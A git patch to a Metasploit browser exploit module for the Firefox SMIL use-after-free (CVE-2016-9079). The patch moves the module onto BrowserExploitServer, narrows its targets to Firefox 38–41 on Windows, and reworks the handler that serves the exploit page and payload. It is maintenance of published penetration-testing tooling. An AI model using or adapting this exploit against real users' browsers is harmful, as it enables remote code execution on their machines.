From 3c6fa12acab618aeffd0f76c96250c5fee7334a1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 31 Jan 2017 16:04:16 -0600
Subject: [PATCH] Update firefox_smil_uaf to use BrowserExploitServer

---
 Gemfile.lock                                  |  2 +-
 .../windows/browser/firefox_smil_uaf.rb       | 42 +++++++++----------
 2 files changed, 20 insertions(+), 24 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 575ff96d2a..65189ce35c 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.8)
+    rex-exploitation (0.1.10)
       jsobfu
       metasm
       rex-arch
diff --git a/modules/exploits/windows/browser/firefox_smil_uaf.rb b/modules/exploits/windows/browser/firefox_smil_uaf.rb
index db02b64685..3031bde126 100644
--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -8,7 +8,7 @@ require 'msf/core'
   class MetasploitModule < Msf::Exploit::Remote
     Rank = NormalRanking
 
-    include Msf::Exploit::Remote::HttpServer
+    include Msf::Exploit::Remote::BrowserExploitServer
 
     def initialize(info={})
       super(update_info(info,
@@ -25,9 +25,17 @@ require 'msf/core'
             'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
           ],
           'Platform'       => 'win',
+          'BrowserRequirements' =>
+            {
+              source:  /script/i,
+              os_name: OperatingSystems::Match::WINDOWS,
+              ua_name: HttpClients::FF,
+              # Fixed in Firefox 50.0.2
+              ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
+            },
           'Targets'        =>
           [
-            [ 'Mozilla Firefox',
+            [ 'Mozilla Firefox 38 to 41',
               {
                 'Platform' => 'win',
                 'Arch'     => ARCH_X86,
@@ -40,11 +48,11 @@ require 'msf/core'
             'InitialAutoRunScript' => 'migrate -f'
           },
           'References'     =>
-          [
-            [ 'CVE', '2016-9079' ],
-            [ 'Bugzilla', '1321066' ]
-          ],
-          'Arch'           => ARCH_X86,
+            [
+              [ 'CVE', '2016-9079' ],
+              [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
+              [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
+            ],
           'DisclosureDate' => "Nov 30 2016",
           'DefaultTarget'  => 0
         )
@@ -60,7 +68,7 @@ require 'msf/core'
     p = payload.encoded
     arch = Rex::Arch.endian(target.arch)
     payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
-    base_uri = "#{get_resource.chomp('/')}"
+    base_uri = get_module_resource
 
     # stuff that gets adjusted alot during testing
 
@@ -248,28 +256,16 @@ require 'msf/core'
     send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
   end
 
-  def is_ff_on_windows(user_agent)
-    target_hash = fingerprint_user_agent(user_agent)
-    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
-      return false
-    end
-      return true
-  end
-
-  def on_request_uri(cli, request)
+  def on_request_exploit(cli, request, browser_info)
     print_status("Got request: #{request.uri}")
     print_status("From: #{request.headers['User-Agent']}")
-    if (!is_ff_on_windows(request.headers['User-Agent']))
-      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
-      send_not_found(cli)
-      close_client(cli)
-      return
-    end
+
     if request.uri =~ /worker\.js/
       print_status("Sending worker thread Javascript ...")
       worker_js(cli)
       return
     end
+
     if request.uri =~ /index\.html/ or request.uri =~ /\//
 
       print_status("Sending exploit HTML ...")